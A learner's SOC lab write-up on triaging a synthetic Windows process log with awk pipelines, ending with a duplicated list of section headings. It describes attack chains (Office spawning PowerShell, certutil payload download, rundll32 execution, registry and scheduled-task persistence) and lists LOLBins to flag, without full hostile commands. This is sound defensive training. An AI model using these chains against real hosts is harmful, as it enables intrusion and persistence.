🧪 Lab 04 – Endpoint Process Chain Triage with Pipe-Delimited Logs and awk

🧪 Lab Objective

Practice SOC-style endpoint triage on a synthetic process creation dataset by using Linux pipelines to answer:

Which parent → child process chains are suspicious?
Which users / hosts are involved?
Which commands were actually run?
How to pivot from one suspicious event into a larger attack story?

🧰 Lab Setup

Dataset

I created a fake Windows-style endpoint process log (proc_events.log) with pipe-delimited fields:

timestamp
host
user
parent process
child process
command line

The dataset intentionally includes:

normal-ish admin/dev activity
suspicious Office/browser → shell / LOLBin chains
persistence indicators (reg.exe, schtasks.exe)
web-server process spawning shells (w3wp.exe -> cmd.exe -> powershell.exe)

This makes it useful for learning triage patterns without real-world noise.

❓Questions I Practiced Answering

Which parent→child combinations happen most often?
Which events contain likely shells / script hosts / LOLBins?
Which hosts and users are associated with suspicious chains?
Which child processes are rare in this dataset?
Are there URLs in command lines, and what domains/URLs appear?
Can I reconstruct a plausible attack narrative for a host?

🛠️ What I Did (Step-by-Step)

1) Built the sample process log

I created proc_events.log using a heredoc and included multiple host/user scenarios:

WS-FIN-07 (Office → PowerShell → certutil → rundll32)
WS-SALES-12 (Outlook/Excel → cmd → PowerShell → reg/schtasks)
WS-MKT-05 (Edge → mshta → PowerShell)
SRV-WEB-01 (w3wp.exe → shell chain)
WS-ENG-02 (developer-ish activity: code → PowerShell → Python → curl)
WS-IT-01 (admin-ish activity: MMC → PowerShell → WMIC)

This was the foundation for all later pivots.

2) Inspected the data format before parsing

I used head to inspect the first rows and confirm the structure.

head -5 proc_events.log

Why this mattered

I initially (accidentally) used whitespace-based parsing on the process log and got broken results because the command line field contains spaces.

That was a good reminder of the rule:

Always inspect format first. Then choose the parser.

3) Switched to the correct parser: `awk -F'|'`

I verified field positions by printing one row with field numbers:

head -1 proc_events.log | awk -F'|' '{for(i=1;i<=NF;i++) print i, $i}'

This confirmed:

$4 = parent process
$5 = child process
$6 = command line

This was the key fix that made the rest of the lab work correctly.

4) Counted parent → child process combinations

I built the first real triage view:

awk -F'|' '{print $4 " -> " $5}' proc_events.log | sort | uniq -c | sort -nr

What this does

extracts parent+child
groups identical chains
counts frequency
ranks them

Why it matters

This turns raw process events into a behavior map.

5) Filtered for likely interesting children (shells / LOLBins / script hosts)

I filtered on the child process field ($5) for things like:

cmd.exe
powershell.exe
mshta.exe
rundll32.exe
certutil.exe
wmic.exe
reg.exe
schtasks.exe

This let me quickly isolate higher-value events without losing the full line context.

6) Filtered suspicious parent + child combinations

I then focused on high-signal combos like:

Office / browser / script-host parents spawning:
- shells
- LOLBins
- script engines

This produced the clearest “triage-worthy” subset of events.

Examples that popped out:

winword.exe -> powershell.exe
excel.exe -> cmd.exe
msedge.exe -> mshta.exe
mshta.exe -> powershell.exe

7) Reformatted suspicious events into a triage-friendly summary line

I used awk to print events in a much more readable form:

HOST=...
USER=...
parent -> child
CMD=...

This made the output feel more like an analyst note than raw logs.

8) Pivoted by host to reconstruct stories

I pivoted on hosts like:

WS-FIN-07
WS-SALES-12

This was the point where the “raw events are narrative fragments” idea really clicked.

Instead of isolated lines, I could see sequences of actions.

9) Counted rare child processes

I ranked child processes by ascending frequency:

awk -F'|' '{print $5}' proc_events.log | sort | uniq -c | sort -n

This helped surface the idea that:

In security, rare can be more valuable than “top N”.

Examples of rare (count = 1 in this dataset):

mshta.exe
reg.exe
schtasks.exe
wmic.exe
curl.exe
python.exe

10) Counted suspicious activity by user and by host

I grouped suspicious parent→child matches by:

user
host

This helped answer:

is this concentrated on one system?
are multiple users involved?
what is the scope?

11) Extracted URLs from command lines

I filtered command lines containing http:// or https://, then extracted rough URLs.

This linked endpoint process behavior to network indicators like:

payload download URLs
check-in URLs
internal portal URL
GitHub API call (likely benign in dev context)

📊 Key Results / Findings

Parent → child frequency (top observation)

The most common chain in this dataset was:

cmd.exe -> powershell.exe (4 times)

This alone is not proof of compromise, but it’s a useful pattern to inspect in context.

Other notable chains:

powershell.exe -> certutil.exe (2 times)
multiple one-off high-signal chains such as:
- winword.exe -> powershell.exe
- msedge.exe -> mshta.exe
- cmd.exe -> rundll32.exe
- w3wp.exe -> cmd.exe

Rare child process counts (useful for signal)

Rare children (count = 1) included:

curl.exe
excel.exe
msedge.exe
mshta.exe
python.exe
reg.exe
schtasks.exe
wmic.exe

This reinforced an important SOC lesson:

Rare process names or chains can be higher-value signals than common admin tools.

Suspicious host distribution (from filtered parent→child combos)

The suspicious-chain grouping showed multiple affected hosts, with WS-MKT-05 appearing more than once in the filtered set.

This supports the “scope” question:

one host = maybe isolated
multiple hosts = broader campaign possibility (or multiple scenarios in a training dataset)

🕵️ Triage Narratives Reconstructed (Most Important Part)

1) `WS-FIN-07` / user `mario` — likely malware execution chain

Observed sequence:

winword.exe -> powershell.exe (encoded/hidden-looking PowerShell)
powershell.exe -> cmd.exe (whoami, ipconfig /all) = recon
powershell.exe -> certutil.exe (download external payload to temp)
cmd.exe -> rundll32.exe (execute DLL from user temp)
rundll32.exe -> powershell.exe (network check-in / web request)

Why this is suspicious

This chain matches a classic pattern:
Office-triggered execution → recon → payload download → DLL execution → callback

2) `WS-SALES-12` / user `andrea` — likely phishing + persistence

Observed sequence:

outlook.exe -> excel.exe (attachment workflow)
excel.exe -> cmd.exe
cmd.exe -> powershell.exe (download/execute style command)
powershell.exe -> reg.exe (Run key persistence in HKCU)
powershell.exe -> schtasks.exe (scheduled task persistence)

Why this is suspicious

This chain strongly suggests:
email/document execution → PowerShell → persistence establishment

3) `WS-MKT-05` / user `sara` — browser → `mshta` → PowerShell

Observed sequence:

msedge.exe -> mshta.exe (remote HTA URL)
mshta.exe -> powershell.exe (download/execute style command)

Why this is suspicious

mshta.exe is a classic LOLBin and very often suspicious in browser-driven chains, especially when calling remote URLs.

4) `SRV-WEB-01` / user `svc_iis` — web server shell chain (high severity)

Observed sequence:

w3wp.exe -> cmd.exe
cmd.exe -> powershell.exe
powershell.exe -> certutil.exe
powershell.exe -> rundll32.exe

Why this is suspicious

A web server worker process spawning shells + LOLBins is a strong indicator of:

web shell behavior
command execution through the web app
exploitation of a vulnerable application

This would be high-priority triage in a real SOC.

⚠️ Mistakes I Made (and Why They Were Valuable)

1) Parsing with the wrong delimiter

I initially treated the log like space-delimited text and got bad field extraction because the command line field includes spaces.

✅ Fix:

switched to awk -F'|'

Takeaway: always identify the true delimiter first.

2) Pasting explanatory text into the shell

Several lines from notes/explanations were pasted directly into Bash, producing:

command not found
syntax errors
noise in the raw session log

✅ Fix:

separated “commands to run” from “explanatory text”
used echo only when intentionally printing notes

Takeaway: in labs, copy only the executable parts.

3) Typos while re-running commands

Examples like accidental merged commands (head -5 proc_events.lohead ...) created noisy output.

✅ Fix:

slowed down and re-ran correctly
used head + field-checking again to re-anchor

Takeaway: when output gets weird, restart from:

head
field mapping
one pipeline at a time

🧠 What I Learned

Technical

How to parse pipe-delimited endpoint process telemetry with awk -F'|'
How to count parent → child chains with sort | uniq -c
How to pivot by:
- host
- user
- child process
- command line URL presence
How to use rare-process counting as a signal-finding technique

SOC thinking

Process name is a clue, not a verdict
Parent → child adds major context quickly
Command line often reveals the actual behavior
Counting/grouping creates evidence
Raw logs become a story only after pivoting and aggregation

🔗 Key Cybersecurity Connections

This lab directly reinforced concepts useful for:

SOC triage
endpoint detection reasoning
process-chain hunting
LOLBin awareness
incident narrative building

It also reinforced why Linux pipelines feel like a mini-SIEM:

filter
extract
group/count
rank
interpret

⏭️ Next Steps

Re-run the same lab from memory (especially awk -F'|' workflows)
Build a one-page cheat sheet of suspicious parent→child chains
Extend the dataset with:
- benign Office behavior
- more admin workflows
- browser downloads that are actually normal
Practice extracting:
- domains (not just URLs)
- file paths in temp/user profile
- persistence indicators
Translate one or two findings into detection logic ideas (Sigma / Splunk / KQL later)

🪞 Reflection

This was one of the most useful labs so far because it connected:

Linux parsing skills
SOC pivots
process vocabulary
investigation thinking

The biggest win was not the commands themselves — it was learning how to turn process events into a timeline/story.

Also, the mistakes (bad delimiter, pasted note text into shell) were actually useful because they forced me to debug my workflow and reinforce the “inspect first, parse second” habit.

Lessons Learned

What worked

Using a synthetic but realistic dataset
Verifying field positions before building pipelines
Counting parent→child combos early
Pivoting by host to reconstruct attack narratives
Looking at rare child processes, not just common ones

What broke

Parsing assumptions (space-delimited thinking)
Copy/paste discipline (notes vs commands)
Typos that created noisy shell output

Why it broke

The command line field contains spaces, so default awk parsing was wrong
I mixed explanatory text with executable commands during practice
I was moving fast and chaining too much before re-checking output

Fix / takeaway

Start every new log with: head + delimiter check + field mapping
Use awk -F'|' for this dataset consistently
Keep notes separate from commands (or prefix notes safely with echo)
If output looks wrong, reset and rebuild one pipeline at a time

🧪 Lab Objective

🧰 Lab Setup

Dataset

❓Questions I Practiced Answering

🛠️ What I Did (Step-by-Step)

1) Built the sample process log

2) Inspected the data format before parsing

Why this mattered

3) Switched to the correct parser: awk -F'|'

4) Counted parent → child process combinations

What this does

Why it matters

5) Filtered for likely interesting children (shells / LOLBins / script hosts)

6) Filtered suspicious parent + child combinations

7) Reformatted suspicious events into a triage-friendly summary line

8) Pivoted by host to reconstruct stories

9) Counted rare child processes

10) Counted suspicious activity by user and by host

11) Extracted URLs from command lines

📊 Key Results / Findings

Parent → child frequency (top observation)

Rare child process counts (useful for signal)

Suspicious host distribution (from filtered parent→child combos)

🕵️ Triage Narratives Reconstructed (Most Important Part)

1) WS-FIN-07 / user mario — likely malware execution chain

Why this is suspicious

2) WS-SALES-12 / user andrea — likely phishing + persistence

Why this is suspicious

3) WS-MKT-05 / user sara — browser → mshta → PowerShell

Why this is suspicious

4) SRV-WEB-01 / user svc_iis — web server shell chain (high severity)

Why this is suspicious

⚠️ Mistakes I Made (and Why They Were Valuable)

1) Parsing with the wrong delimiter

2) Pasting explanatory text into the shell

3) Typos while re-running commands

🧠 What I Learned

Technical

SOC thinking

🔗 Key Cybersecurity Connections

⏭️ Next Steps

🪞 Reflection

Lessons Learned

What worked

What broke

Why it broke

Fix / takeaway

3) Switched to the correct parser: `awk -F'|'`

1) `WS-FIN-07` / user `mario` — likely malware execution chain

2) `WS-SALES-12` / user `andrea` — likely phishing + persistence

3) `WS-MKT-05` / user `sara` — browser → `mshta` → PowerShell

4) `SRV-WEB-01` / user `svc_iis` — web server shell chain (high severity)